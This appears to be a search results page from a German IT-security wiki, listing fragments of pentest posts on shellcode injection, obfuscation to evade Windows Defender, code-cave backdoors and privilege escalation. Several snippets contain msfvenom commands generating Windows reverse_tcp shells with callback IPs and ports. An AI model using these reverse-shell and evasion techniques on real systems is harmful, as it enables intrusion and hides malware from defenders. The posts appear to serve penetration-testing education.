Search
You can find the results of your search below.
Matching pagenames:
Fulltext results:
- FatCat Attack PoC
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... d generieren <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Obfuscation: Shellcode als UUIDs tarnen
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: Shellcode als UUIDs ... ode, die ich hierbei zum Testen nutzte, wurde vom Windows Defender sofort blockiert. Somit musste ich Loade... bzw. Enkodierung. Dieses wird in der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilegien-Eskalation: Windows-Admin dank Linux
- {{tag>it-security windows linux blog deutsch}} ====== Privilegien-Eskalation: Windows-Admin dank Linux ====== In diesem Tutorial zeige ich euch, wie man sich Administrator-Rechte an Windows PCs mittels Live-Boot CD sichern kann. Wir werden... og:screenshot_2024-03-14_144552.png|}} Auf einem Windows System sind die Benutzer ''User'' und ''sysadmin'
- Backdoor development with Code Caves
- {{tag>IT-Security Windows backdoor shellcode blog deutsch english}} ====== Backdoor development with Code ... s ==== Metasploit shells typically reference the Windows function ''%%WaitForSingleObject%%'' with the arg... llcode from the file ''%%modules/payloads/singles/windows/x64/shell_reverse_tcp%%'' and modify the affected... generate our shellcode: <code shell> msfvenom -p windows/x64/custom_shell_reverse_tcp LHOST=172.18.75.2 LP
- Shellcode Injection Teil 2
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 2 ====== {{:it-secur... n. Diese Form der Injection wird in der Regel vom Windows Defender erkannt, so dass wir wieder einige Obfus... e Ausgabe erfolgt binär: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ithub.com/fritzone/obfy )) war direkt ein Erfolg. Windows Defender konnte die kompilierte Datei nicht mehr
- Shellcode Injection Teil 1
- {{tag>it-security windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 1 ====== {{:it-secur... e in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... Shellcode im Raw Format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Shellcode Injection Teil 4
- {{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 4 ====== {{:it-secur... füllt sein: * Start von ''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-By... Adresse ==== Mit jedem Start eines Prozesses in Windows, werden Module in diesen Prozess geladen. Eines d... ''kernel32.dll''. Im Arbeitsspeicher werden durch Windows Datenstrukturen angelegt, welche alle für uns nöt
- Obfuscation: polymorpher In-Memory Decoder
- {{tag>IT-Security Windows Kali pentest obfuscation blog deutsch}} ====== Obfuscation: polymorpher In-Memor... ilieren. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... ährend meines Tests wurde selbst das Metasploit Payload nicht vom Windows Defender erkannt. ~~DISCUSSION~~
- Shellcode Injection Teil 3
- {{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 3 ====== {{:it-secur... stellen === Den Shellcode müssen wir als ''%%x86 Windows%%'' Binärdatei ausgeben. Dies machen wir mit ''%%
- Die Bedeutung von Awareness in der IT-Sicherheit
- elche als Anhang in einer E-Mail geschickt wurde. Windows hat diese eingebunden und die Schadsoftware konnt
- Obfuscation: ByteSwapping
- {{tag>IT-Security Windows Kali shellcode blog deutsch}} ====== Obfuscation: ByteSwapping ====== {{:it-sec